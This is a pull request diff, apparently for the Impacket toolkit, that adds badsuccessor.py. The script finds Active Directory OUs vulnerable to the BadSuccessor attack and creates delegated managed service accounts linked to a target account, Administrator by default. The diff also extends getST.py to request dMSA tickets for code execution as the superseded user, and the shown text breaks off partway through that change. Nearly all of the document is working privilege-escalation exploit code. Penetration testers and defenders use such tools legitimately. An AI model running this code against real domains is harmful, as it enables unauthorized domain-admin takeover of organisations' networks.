### PR TITLE
Add badsuccessor attack example

### DIFF
--- a/examples/badsuccessor.py
+++ b/examples/badsuccessor.py
@@ -1,0 +1,702 @@
+#!/usr/bin/env python3
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies 
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   This script is a tool for dMSA exploitation.
+#   Search function is based on AKAMAI Get-BadSuccessorOUPermissions.ps1 (https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1)
+#   It allows to add/delete Delegated Managed Service Accounts (dMSA) in a specific OU, search for OUs vulnerable to BadSuccessor attack
+# Author:
+#   Ilya Yatsenko (@fulc2um)
+
+
+from __future__ import division
+from __future__ import print_function
+from __future__ import unicode_literals
+
+import argparse
+import logging
+import random
+import string
+import sys
+import ssl
+import ldap3
+
+from impacket import version
+from impacket.examples import logger
+from impacket.examples.utils import parse_identity, parse_target, ldap3_kerberos_login
+from impacket.ldap import ldaptypes
+
+
+class BADSUCCESSOR:
+    def __init__(self, username, password, domain, lmhash, nthash, cmdLineOptions):
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__lmhash = lmhash
+        self.__nthash = nthash
+        self.__hashes = cmdLineOptions.hashes
+        self.__aesKey = cmdLineOptions.aesKey
+        self.__doKerberos = cmdLineOptions.k
+        self.__target = cmdLineOptions.dc_host
+        self.__kdcHost = cmdLineOptions.dc_host
+        self.__dmsaName = cmdLineOptions.dmsa_name
+        self.__method = cmdLineOptions.method
+        self.__port = cmdLineOptions.port
+        self.__action = cmdLineOptions.action
+        self.__targetIp = cmdLineOptions.dc_ip
+        self.__baseDN = cmdLineOptions.baseDN
+        self.__targetOu = cmdLineOptions.target_ou
+        self.__principalsAllowed = cmdLineOptions.principals_allowed
+        self.__targetAccount = cmdLineOptions.target_account
+        self.__dnsHostName = cmdLineOptions.dns_hostname
+        self.__ldapsFlag = cmdLineOptions.ldaps_flag
+
+        if self.__targetIp is not None:
+            self.__kdcHost = self.__targetIp
+
+        if self.__method not in ['LDAP', 'LDAPS']:
+            raise ValueError("Unsupported method %s" % self.__method)
+
+        if self.__doKerberos and cmdLineOptions.dc_host is None:
+            raise ValueError("Kerberos auth requires DNS name of the target DC. Use -dc-host.")
+
+        if self.__method == 'LDAPS' and not '.' in self.__domain:
+                logging.warning('\'%s\' doesn\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)
+
+        if self.__target is None:
+            if not '.' in self.__domain:
+                logging.warning('No DC host set and \'%s\' doesn\'t look like a FQDN. DNS resolution of short names will probably fail.' % self.__domain)
+            self.__target = self.__domain
+
+        if self.__port is None:
+            if self.__method == 'LDAP':
+                self.__port = 389
+            elif self.__method == 'LDAPS':
+                self.__port = 636
+
+    def run(self):
+        # Create the baseDN if not provided
+        if self.__baseDN is None:
+            domainParts = self.__domain.split('.')
+            self.__baseDN = ''
+            for i in domainParts:
+                self.__baseDN += 'dc=%s,' % i
+            # Remove last ','
+            self.__baseDN = self.__baseDN[:-1]
+
+
+        try:
+            connectTo = self.__target
+            if self.__targetIp is not None:
+                connectTo = self.__targetIp
+            
+            user = '%s\\%s' % (self.__domain, self.__username)
+            use_ldaps = (self.__method == 'LDAPS' or self.__ldapsFlag)
+            
+            if use_ldaps:
+                tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2, ciphers='ALL:@SECLEVEL=0')
+                try:
+                    ldapServer = ldap3.Server(connectTo, use_ssl=True, port=self.__port, get_info=ldap3.ALL, tls=tls)
+                    if self.__doKerberos:
+                        ldapConnection = ldap3.Connection(ldapServer)
+                        ldap3_kerberos_login(ldapConnection, connectTo, self.__username, self.__password, self.__domain, 
+                                           self.__lmhash, self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+                    elif self.__hashes is not None:
+                        ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__hashes, authentication=ldap3.NTLM)
+                        if not ldapConnection.bind():
+                            raise Exception('Failed to bind to LDAP with hash')
+                    else:
+                        ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__password, authentication=ldap3.NTLM)
+                        if not ldapConnection.bind():
+                            raise Exception('Failed to bind to LDAP with password')
+                except ldap3.core.exceptions.LDAPSocketOpenError:
+                    # Try TLSv1 fallback
+                    tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1, ciphers='ALL:@SECLEVEL=0')
+                    ldapServer = ldap3.Server(connectTo, use_ssl=True, port=self.__port, get_info=ldap3.ALL, tls=tls)
+                    if self.__doKerberos:
+                        ldapConnection = ldap3.Connection(ldapServer)
+                        ldap3_kerberos_login(ldapConnection, connectTo, self.__username, self.__password, self.__domain, 
+                                           self.__lmhash, self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+                    elif self.__hashes is not None:
+                        ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__hashes, authentication=ldap3.NTLM)
+                        if not ldapConnection.bind():
+                            raise Exception('Failed to bind to LDAP with hash (fallback)')
+                    else:
+                        ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__password, authentication=ldap3.NTLM)
+                        if not ldapConnection.bind():
+                            raise Exception('Failed to bind to LDAP with password (fallback)')
+            else:
+                # Plain LDAP
+                ldapServer = ldap3.Server(connectTo, port=self.__port, get_info=ldap3.ALL)
+                if self.__doKerberos:
+                    ldapConnection = ldap3.Connection(ldapServer)
+                    ldap3_kerberos_login(ldapConnection, connectTo, self.__username, self.__password, self.__domain, 
+                                       self.__lmhash, self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+                elif self.__hashes is not None:
+                    ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__hashes, authentication=ldap3.NTLM)
+                    ldapConnection.bind()
+                else:
+                    ldapConnection = ldap3.Connection(ldapServer, user=user, password=self.__password, authentication=ldap3.NTLM)
+                    ldapConnection.bind()
+                    
+        except Exception as e:
+            raise Exception('Could not connect to LDAP server: %s' % str(e))
+
+        self.__target = connectTo
+        logging.info('Connected to %s as %s\\%s' % (self.__target, self.__domain, self.__username))
+
+
+        if self.__action == 'add':
+            result = self.add_dmsa(ldapConnection)
+        elif self.__action == 'delete':
+            result = self.delete_dmsa(ldapConnection)
+        elif self.__action == 'search':
+            result = self.search_ous(ldapConnection)
+        else:
+            logging.error('Unknown action: %s' % self.__action)
+            result = False
+
+        ldapConnection.unbind()
+        return result
+
+    def delete_dmsa(self, ldapConnection):
+        try:
+            if not self.__dmsaName:
+                logging.error('dMSA name is required for deletion. Use -dmsa-name parameter.')
+                return False
+            
+            if not self.__targetOu:
+                logging.error('Target OU is required for dMSA deletion. Use -target-ou parameter.')
+                return False
+            
+            dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)
+            if not self.check_account_exists(ldapConnection, dmsa_dn):
+                logging.error('dMSA account does not exist: %s' % dmsa_dn)
+                return False
+            
+            success = ldapConnection.delete(dmsa_dn)
+            
+            print("")
+            print("%-30s %s" % ("dMSA Deletion Results", ""))
+            print("%-30s %s" % ("-" * 30, "-" * 30))
+            print("%-30s %s" % ("dMSA Name:", '%s$' % self.__dmsaName))
+            print("%-30s %s" % ("Status:", "SUCCESS" if success else "FAILED"))
+            
+            if not success and ldapConnection.result:
+                print("%-30s %s" % ("Error:", ldapConnection.result))
+            print("")
+            
+            return success
+                
+        except Exception as e:
+            logging.error('dMSA deletion failed: %s' % str(e))
+            return False
+    
+    def check_account_exists(self, ldapConnection, dn):
+        try:
+            success = ldapConnection.search(
+                search_base=dn,
+                search_filter='(objectClass=*)',
+                search_scope=ldap3.BASE,
+                attributes=['cn']
+            )
+            
+            return success and len(ldapConnection.entries) > 0
+                
+        except Exception as e:
+            logging.debug('Error checking account existence: %s' % str(e))
+            # If we can't determine, assume it doesn't exist to avoid blocking operations
+            return False
+
+    def search_ous(self, ldapConnection):
+        try:
+            logging.info('Searching for OUs vulnerable to BadSuccessor attack...')
+            
+            if not ldapConnection.bound:
+                logging.error('LDAP connection is not bound')
+                return False
+            
+            success = ldapConnection.search(
+                search_base=self.__baseDN,
+                search_filter='(objectClass=organizationalUnit)',
+                search_scope=ldap3.SUBTREE,
+                attributes=['distinguishedName', 'nTSecurityDescriptor'],
+                controls=ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x07)
+            )
+            
+            if not success:
+                success = ldapConnection.search(
+                    search_base=self.__baseDN,
+                    search_filter='(objectClass=organizationalUnit)',
+                    search_scope=ldap3.SUBTREE,
+                    attributes=['distinguishedName', 'nTSecurityDescriptor']
+                )
+            
+            if not success:
+                logging.error('Failed to search for organizational units: %s' % ldapConnection.result)
+                return False
+            
+            # Store the OU entries before they get overwritten by other searches
+            ou_entries = list(ldapConnection.entries)
+            logging.info('Found %d organizational units' % len(ou_entries))
+            
+            # Get domain SID for filtering excluded accounts
+            try:
+                success = ldapConnection.search(
+                    search_base=self.__baseDN,
+                    search_filter='(objectClass=domain)',
+                    search_scope=ldap3.BASE,
+                    attributes=['objectSid']
+                )
+                
+                if success and len(ldapConnection.entries) > 0:
+                    entry = ldapConnection.entries[0]
+                    if 'objectSid' in entry:
+                        domain_sid = entry.objectSid.value
+            except Exception as e:
+                logging.error('Failed to retrieve domain SID: %s' % str(e))
+                return False
+            allowed_identities = {}
+            
+            relevant_rights = {
+                "CreateChild": 0x00000001,
+                "GenericAll": 0x10000000,
+                "WriteDACL": 0x00040000,
+                "WriteOwner": 0x00080000
+            }
+            
+            relevant_object_types = {
+                "00000000-0000-0000-0000-000000000000": "All Objects",
+                "0feb936f-47b3-49f2-9386-1dedc2c23765": "msDS-DelegatedManagedServiceAccount",
+            }
+            
+            for entry in ou_entries:
+                try:
+                    ou_dn = str(entry.entry_dn)
+                    
+                    if 'nTSecurityDescriptor' not in entry or not entry.nTSecurityDescriptor.value:
+                        continue
+                        
+                    sd_data = entry.nTSecurityDescriptor.value
+                    sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data)
+                    
+                    # Process DACL entries (ACEs)
+                    dacl = sd['Dacl']
+                    if dacl and hasattr(dacl, 'aces') and dacl.aces:
+                        for ace in dacl.aces:
+                            # Only process ALLOW ACEs
+                            if ace['AceType'] != ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
+                                continue
+                                
+                            # Check if ACE has relevant rights
+                            mask = int(ace['Ace']['Mask']['Mask'])
+                            has_relevant_right = any(mask & right_value for right_value in relevant_rights.values())
+                            if not has_relevant_right:
+                                continue
+                            
+                            # Check object type (must match relevant object types)
+                            object_type = getattr(ace['Ace'], 'ObjectType', None)
+                            if object_type:
+                                object_guid = str(object_type).lower()
+                                if object_guid not in relevant_object_types:
+                                    continue
+                                
+                            sid = ace['Ace']['Sid'].formatCanonical()
+                            
+                            if self.is_excluded_sid(sid, domain_sid):
+                                continue
+                            
+                            identity = self.resolve_sid_to_name(ldapConnection, sid)
+                            if identity not in allowed_identities:
+                                allowed_identities[identity] = []
+                            if ou_dn not in allowed_identities[identity]:
+                                allowed_identities[identity].append(ou_dn)
+                    
+                    try:
+                        owner_sid = sd['OwnerSid'].formatCanonical()
+                        if not self.is_excluded_sid(owner_sid, domain_sid):
+                            identity = self.resolve_sid_to_name(ldapConnection, owner_sid)
+                            if identity not in allowed_identities:
+                                allowed_identities[identity] = []
+                            if ou_dn not in allowed_identities[identity]:
+                                allowed_identities[identity].append(ou_dn)
+                    except:
+                        pass
+                        
+                except Exception as e:
+                    continue
+            
+            if allowed_identities:
+                logging.info('Found %d identities with BadSuccessor privileges:' % len(allowed_identities))
+                print("")
+                print("%-50s %s" % ("Identity", "Vulnerable OUs"))
+                print("%-50s %s" % ("-" * 50, "-" * 30))
+                
+                for identity, ous in allowed_identities.items():
+                    ou_list = "{%s}" % ", ".join(ous)
+                    print("%-50s %s" % (identity[:50], ou_list))
+                print("")
+            else:
+                logging.info('No identities found with BadSuccessor privileges')
+                print("")
+                print("%-50s %s" % ("Identity", "Vulnerable OUs"))
+                print("%-50s %s" % ("-" * 50, "-" * 30))
+                print("%-50s %s" % ("(none)", "(none)"))
+                print("")
+                
+            return True
+            
+        except Exception as e:
+            logging.error('BadSuccessor search failed: %s' % str(e))
+            return False
+
+    def is_excluded_sid(self, sid, domain_sid):
+        excluded_sids = ["S-1-5-32-544", "S-1-5-18"]  # BUILTIN\Administrators, SYSTEM
+        excluded_suffixes = ["-512", "-519"]  # Domain Admins, Enterprise Admins
+        
+        if sid in excluded_sids:
+            return True
+            
+        if domain_sid:
+            for suffix in excluded_suffixes:
+                if sid.startswith(domain_sid) and sid.endswith(suffix):
+                    return True
+                    
+        return False
+
+    def resolve_sid_to_name(self, ldapConnection, sid):
+        try:
+            # Handle well-known SIDs 
+            well_known_sids = {
+                'S-1-1-0': 'Everyone',
+                'S-1-5-11': 'NT AUTHORITY\\Authenticated Users',
+                'S-1-5-32-544': 'BUILTIN\\Administrators',
+                'S-1-5-32-545': 'BUILTIN\\Users',
+                'S-1-5-32-546': 'BUILTIN\\Guests',
+                'S-1-5-18': 'NT AUTHORITY\\SYSTEM',
+                'S-1-5-19': 'NT AUTHORITY\\LOCAL SERVICE',
+                'S-1-5-20': 'NT AUTHORITY\\NETWORK SERVICE',
+                'S-1-3-0': 'CREATOR OWNER',
+                'S-1-3-1': 'CREATOR GROUP',
+                'S-1-5-9': 'NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS',
+                'S-1-5-10': 'NT AUTHORITY\\SELF',
+            }
+            
+            if sid in well_known_sids:
+                return well_known_sids[sid]
+            
+            success = ldapConnection.search(
+                search_base=self.__baseDN,
+                search_filter='(objectSid=%s)' % sid,
+                search_scope=ldap3.SUBTREE,
+                attributes=['sAMAccountName']
+            )
+            
+            if success and len(ldapConnection.entries) > 0:
+                entry = ldapConnection.entries[0]
+                if 'sAMAccountName' in entry:
+                    username = entry.sAMAccountName.value
+                    return '%s\\%s' % (self.__domain.upper(), username)
+                    
+            return sid
+            
+        except Exception as e:
+            logging.debug('Error resolving SID %s: %s' % (sid, str(e)))
+            return sid
+
+
+    def generate_dmsa_name(self):
+        random_suffix = ''.join(random.choices(string.ascii_uppercase + string.digits, k=8))
+        return 'dMSA-%s' % random_suffix
+
+    def convert_sid_to_string(self, sid_bytes):
+        try:
+            if not sid_bytes:
+                return None
+                
+            if isinstance(sid_bytes, str):
+                sid_bytes = sid_bytes.encode('latin-1')
+            
+            if len(sid_bytes) < 8:
+                return None
+                
+            revision = sid_bytes[0]
+            authority_count = sid_bytes[1]
+            
+            expected_length = 8 + (authority_count * 4)
+            if len(sid_bytes) < expected_length:
+                return None
+                
+            authority = int.from_bytes(sid_bytes[2:8], 'big')
+            
+            subauthorities = []
+            for i in range(authority_count):
+                offset = 8 + (i * 4)
+                if offset + 4 <= len(sid_bytes):
+                    subauth = int.from_bytes(sid_bytes[offset:offset+4], 'little')
+                    subauthorities.append(str(subauth))
+                else:
+                    break
+            
+            if subauthorities:
+                sid_string = 'S-%d-%d-%s' % (revision, authority, '-'.join(subauthorities))
+            else:
+                sid_string = 'S-%d-%d' % (revision, authority)
+                
+            return sid_string
+            
+        except Exception as e:
+            logging.debug('Error converting SID bytes to string: %s' % str(e))
+            return None
+
+    def build_security_descriptor(self, user_sid):
+        try:
+            if not user_sid:
+                return None
+            # Handle both string and bytes SID formats
+            if isinstance(user_sid, str):
+                if user_sid.startswith('S-'):
+                    sid_string = user_sid
+                else:
+                    return None
+            else:
+                sid_string = self.convert_sid_to_string(user_sid)
+                if not sid_string:
+                    return None
+            sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
+            sd['Revision'] = b'\x01'
+            sd['Sbz1'] = b'\x00'
+            sd['Control'] = 32772
+            sd['OwnerSid'] = ldaptypes.LDAP_SID()
+            sd['OwnerSid'].fromCanonical(sid_string)
+            sd['GroupSid'] = b''
+            sd['Sacl'] = b''
+            acl = ldaptypes.ACL()
+            acl['AclRevision'] = 4
+            acl['Sbz1'] = 0
+            acl['Sbz2'] = 0
+            acl.aces = []
+            nace = ldaptypes.ACE()
+            nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
+            nace['AceFlags'] = 0x00
+            acedata = ldaptypes.ACCESS_ALLOWED_ACE()
+            acedata['Mask'] = ldaptypes.ACCESS_MASK()
+            acedata['Mask']['Mask'] = 0x000F01FF
+            acedata['Sid'] = ldaptypes.LDAP_SID()
+            acedata['Sid'].fromCanonical(sid_string)
+            nace['Ace'] = acedata
+            acl.aces.append(nace)
+            sd['Dacl'] = acl
+            return sd.getData()
+        except Exception as e:
+            logging.debug('Error building security descriptor: %s' % str(e))
+            return None
+    
+
+    def add_dmsa(self, ldapConnection):
+        try:
+            if not self.__dmsaName:
+                self.__dmsaName = self.generate_dmsa_name()
+            
+            if not self.__targetOu:
+                logging.error('Target OU is required for dMSA creation. Use -target-ou parameter.')
+                return False
+            
+            dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)
+            if self.check_account_exists(ldapConnection, dmsa_dn):
+                logging.error('dMSA account already exists: %s' % dmsa_dn)
+                return False
+            
+            principals_allowed = self.__principalsAllowed if self.__principalsAllowed else self.__username
+            target_account = self.__targetAccount if self.__targetAccount else 'Administrator'
+            
+            dns_hostname = self.__dnsHostName if self.__dnsHostName else '%s.%s' % (self.__dmsaName.lower(), self.__domain)
+            
+            # Validate DNS hostname format
+            if not dns_hostname or '.' not in dns_hostname:
+                dns_hostname = '%s.%s' % (self.__dmsaName.lower(), self.__domain)
+            
+            attributes = {
+                'objectClass': ['msDS-DelegatedManagedServiceAccount'],
+                'cn': self.__dmsaName,
+                'sAMAccountName': '%s$' % self.__dmsaName,
+                'dNSHostName': dns_hostname,
+                'userAccountControl': 4096,
+                'msDS-ManagedPasswordInterval': 30,
+                'msDS-DelegatedMSAState': 2,
+                'msDS-SupportedEncryptionTypes': 28,
+                'accountExpires': 9223372036854775807,
+            }
+
+            group_msa_membership = None
+            try:
+                search_filter = '(&(objectClass=user)(sAMAccountName=%s))' % principals_allowed
+                success = ldapConnection.search(
+                    search_base=self.__baseDN,
+                    search_filter=search_filter,
+                    search_scope=ldap3.SUBTREE,
+                    attributes=['objectSid'])
+                if success and len(ldapConnection.entries) > 0:
+                    entry = ldapConnection.entries[0]
+                    if 'objectSid' in entry:
+                        user_sid = entry.objectSid.value
+                if user_sid:
+                    descriptor = self.build_security_descriptor(user_sid)
+                    if descriptor:
+                        group_msa_membership =  descriptor
+                
+            except Exception as e:
+                logging.debug('Error building MSA membership: %s' % str(e))
+                return b''
+            
+            if group_msa_membership:
+                attributes['msDS-GroupMSAMembership'] = group_msa_membership
+
+            target_dn = None
+            success = ldapConnection.search(
+                search_base=self.__baseDN, 
+                search_filter='(&(objectClass=*)(sAMAccountName=%s))' % target_account,
+                search_scope=ldap3.SUBTREE,
+                attributes=['distinguishedName', 'objectClass']
+            )
+
+            if success and len(ldapConnection.entries) > 0:
+                for entry in ldapConnection.entries:
+                    object_classes = [str(oc).lower() for oc in entry.objectClass.values]
+                    if 'user' in object_classes or 'computer' in object_classes:
+                        target_dn = str(entry.entry_dn)
+                # Return first match if no user/computer found
+                target_dn = str(ldapConnection.entries[0].entry_dn)
+
+                if target_dn:
+                    attributes['msDS-ManagedAccountPrecededByLink'] = target_dn
+                
+
+           
+            else:
+                logging.error('Target account not found: %s' % target_account)
+                return False
+            if not attributes:
+                logging.error('Failed to prepare dMSA attributes')
+                return False
+            
+            success = ldapConnection.add(dmsa_dn, attributes=attributes)
+
+            if success:
+                print("")
+                print("%-30s %s" % ("-" * 30, "-" * 30))
+                print("%-30s %s" % ("dMSA Name:", '%s$' % self.__dmsaName))
+                print("%-30s %s" % ("DNS Hostname:", attributes.get('dNSHostName', 'Unknown')))
+                print("%-30s %s" % ("Migration status: ", attributes.get('msDS-DelegatedMSAState', 'Unknown')))
+                print("%-30s %s" % ("Principals Allowed:", principals_allowed))
+                print("%-30s %s" % ("Target Account:", target_account))
+                return True
+            else:
+                if ldapConnection.result:
+                    logging.error('LDAP error: %s' % ldapConnection.result)
+                return False
+                
+        except Exception as e:
+            logging.error('dMSA creation failed: %s' % str(e))
+            return False
+
+if __name__ == '__main__':
+    print(version.BANNER)
+
+    parser = argparse.ArgumentParser(add_help = True, description = "dMSA exploitation tool.")
+
+    parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.')
+    parser.add_argument('-dmsa-name', action='store', metavar='dmsa_name', help='Name of dMSA to add. If omitted, a random DESKTOP-[A-Z0-9]{8} will be used.')
+    parser.add_argument('-action', choices=['add',  'delete', 'search'], default='search', help='Action to perform: add (requires -principals-allowed, -target-account, -target-ou), delete (requires -dmsa-name, -target-ou), search a dMSA.')
+    parser.add_argument('-target-ou', action='store', metavar='OU_DN', help='Specific OU to check for dMSA creation capabilities (e.g., "OU=weakOU,DC=domain,DC=local")')
+    parser.add_argument('-principals-allowed', action='store', metavar='USERNAME', help='Username allowed to retrieve the managed password. If omitted, the current user will be used.')
+    parser.add_argument('-target-account', action='store', metavar='USERNAME', help='Target user or computer account DN to set for msDS-ManagedAccountPrecededByLink (can target Domain Controllers, Domain Admins, Protected Users, etc.)')
+    parser.add_argument('-dns-hostname', action='store', metavar='HOSTNAME', help='DNS hostname for the dMSA. If omitted, will be generated as dmsaname.domain.')
+    parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
+    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+    parser.add_argument('-method', choices=['LDAP', 'LDAPS'], default='LDAPS', help='Method of adding the computer. LDAPS has some certificate requirements and isn\'t always available.')
+
+    parser.add_argument('-port', type=int, choices=[389, 636], help='Destination port to connect to. LDAP defaults to 389, LDAPS to 636.')
+
+    group = parser.add_argument_group('LDAP')
+    group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP. If ommited, the domain part (FQDN) specified in the account parameter will be used.')
+
+    group = parser.add_argument_group('authentication')
+    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
+    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+    group.add_argument('-dc-host', action='store',metavar = "hostname",  help='Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used')
+    group.add_argument('-dc-ip', action='store',metavar = "ip",  help='IP of the domain controller to use. Useful if you can\'t translate the FQDN.')
+    group.add_argument('-use-ldaps', dest='ldaps_flag', action="store_true", help='Enable LDAPS (LDAP over SSL). Required when querying a Windows Server 2025 domain controller with LDAPS enforced.')
+
+    if len(sys.argv)==1:
+        parser.print_help()
+        sys.exit(1)
+
+    options = parser.parse_args()
+
+    if options.action == 'add':
+        required_args = []
+        if not options.principals_allowed:
+            required_args.append('-principals-allowed')
+        if not options.target_account:
+            required_args.append('-target-account')
+        if not options.target_ou:
+            required_args.append('-target-ou')
+        
+        if required_args:
+            parser.error('Action "add" requires the following arguments: %s' % ', '.join(required_args))
+    
+    elif options.action == 'delete':
+        required_args = []
+        if not options.dmsa_name:
+            required_args.append('-dmsa-name')
+        if not options.target_ou:
+            required_args.append('-target-ou')
+        
+        if required_args:
+            parser.error('Action "delete" requires the following arguments: %s' % ', '.join(required_args))
+
+    logger.init(options.ts, options.debug)
+    
+    if '@' in options.account and options.dc_host is None:
+        domain, username, password, remote_host = parse_target(options.account)
+        if domain == '':
+            logging.critical('Domain should be specified!')
+            sys.exit(1)
+        options.dc_host = remote_host
+        
+        if password == '' and username != '' and options.hashes is None and not options.no_pass and options.aesKey is None:
+            from getpass import getpass
+            password = getpass("Password:")
+        
+        lmhash = ''
+        nthash = ''
+        if options.hashes is not None:
+            lmhash, nthash = options.hashes.split(':')
+            if lmhash == '':
+                lmhash = 'AAD3B435B51404EEAAD3B435B51404EE' 
+        
+        if options.aesKey is not None:
+            options.k = True
+    else:
+        domain, username, password, lmhash, nthash, options.k = parse_identity(options.account, options.hashes, options.no_pass, options.aesKey, options.k)
+
+    if domain == '':
+        logging.critical('Domain should be specified!')
+        sys.exit(1)
+
+    try:
+        executer = BADSUCCESSOR(username, password, domain, lmhash, nthash, options)
+        executer.run()
+    except Exception as e:
+        print(str(e))

--- a/examples/badsuccessor.py
+++ b/examples/badsuccessor.py
@@ -225,7 +225,7 @@ class BADSUCCESSOR:
                 search_filter='(objectClass=organizationalUnit)',
                 search_scope=ldap3.SUBTREE,
                 attributes=['distinguishedName', 'nTSecurityDescriptor'],
-                controls=ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x15)
+                controls=ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x5)
             )
 
             

--- a/examples/badsuccessor.py
+++ b/examples/badsuccessor.py
@@ -501,7 +501,7 @@ class BADSUCCESSOR:
                 logging.error('dMSA account already exists: %s' % dmsa_dn)
                 return False
             
-            principals_allowed = self.__principalsAllowed if self.__principalsAllowed else 'Administrator'
+            principals_allowed = self.__principalsAllowed if self.__principalsAllowed else self.__username
             target_account = self.__targetAccount if self.__targetAccount else 'Administrator'
             
             dns_hostname = self.__dnsHostName if self.__dnsHostName else '%s.%s' % (self.__dmsaName.lower(), self.__domain)
@@ -598,10 +598,10 @@ if __name__ == '__main__':
 
     parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.')
     parser.add_argument('-dmsa-name', action='store', metavar='dmsa_name', help='Name of dMSA to add. If omitted, a random dMSA-[A-Z0-9]{8} will be used.')
-    parser.add_argument('-action', choices=['add',  'delete', 'search'], default='search', help='Action to perform: add (requires -principals-allowed, -target-account, -target-ou), delete (requires -dmsa-name, -target-ou), search a dMSA.')
+    parser.add_argument('-action', choices=['add',  'delete', 'search'], default='search', help='Action to perform: add (requires -target-ou), delete (requires -dmsa-name, -target-ou), search a dMSA.')
     parser.add_argument('-target-ou', action='store', metavar='OU_DN', help='Specific OU to check for dMSA creation capabilities (e.g., "OU=weakOU,DC=domain,DC=local")')
-    parser.add_argument('-principals-allowed', action='store', metavar='USERNAME', default='Administrator', help='Username allowed to retrieve the managed password. If omitted, Administrator will be used.')
-    parser.add_argument('-target-account', action='store', metavar='USERNAME', help='Target user or computer account DN to set for msDS-ManagedAccountPrecededByLink (can target Domain Controllers, Domain Admins, Protected Users, etc.)')
+    parser.add_argument('-principals-allowed', action='store', metavar='USERNAME', help='Username allowed to retrieve the managed password. If omitted, current username will be used.')
+    parser.add_argument('-target-account', action='store', metavar='USERNAME', default='Administrator', help='Target user or computer account DN to set for msDS-ManagedAccountPrecededByLink (can target Domain Controllers, Domain Admins, Protected Users, etc.)')
     parser.add_argument('-dns-hostname', action='store', metavar='HOSTNAME', help='DNS hostname for the dMSA. If omitted, will be generated as dmsaname.domain.')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
@@ -628,8 +628,6 @@ if __name__ == '__main__':
 
     if options.action == 'add':
         required_args = []
-        if not options.target_account:
-            required_args.append('-target-account')
         if not options.target_ou:
             required_args.append('-target-ou')
         

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -31,6 +31,10 @@
 #
 #   The output of this script will be a service ticket for the Administrator user.
 #
+#   Implemented by @fulc2um: you can request a ticket for dMSA account and use it for code execution with privileges of superceded user.
+#   Assume that dMSA account dmsa$ is dMSA account and Administrator is superceded account:
+#         ./getST.py -k -no-pass -impersonate dmsa$ -self -dmsa contoso.com/user
+#
 #   Once you have the ccache file, set it in the KRB5CCNAME variable and use it for fun and profit.
 #
 # Authors:
@@ -57,16 +61,17 @@ from six import ensure_binary
 
 from pyasn1.codec.der import decoder, encoder
 from pyasn1.type.univ import noValue
+from pyasn1.type import tag
 
 from impacket import version
 from impacket.examples import logger
 from impacket.examples.utils import parse_identity
 from impacket.krb5 import constants, types, crypto, ccache
 from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
-    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart, S4UUserID, PA_S4U_X509_USER, PA_DMSA_KEY_PACKAGE
 from impacket.krb5.ccache import CCache, Credential
-from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype, string_to_key
-from impacket.krb5.constants import TicketFlags, encodeFlags
+from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype, string_to_key, _get_checksum_profile, Cksumtype
+from impacket.krb5.constants import TicketFlags, encodeFlags, ApplicationTagNumbers
 from impacket.krb5.kerberosv5 import getKerberosTGS, getKerberosTGT, sendReceive
 from impacket.krb5.types import Principal, KerberosTime, Ticket
 from impacket.ntlm import compute_nthash
@@ -85,6 +90,7 @@ class GETST:
         self.__kdcHost = options.dc_ip
         self.__force_forwardable = options.force_forwardable
         self.__additional_ticket = options.additional_ticket
+        self.__dmsa = options.dmsa
         self.__saveFileName = None
         self.__no_s4u2proxy = options.no_s4u2proxy
         if options.hashes is not None:
@@ -421,34 +427,79 @@ class GETST:
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('S4UByteArray')
             hexdump(S4UByteArray)
+        
+        paencoded = None
+        padatatype = None
+        
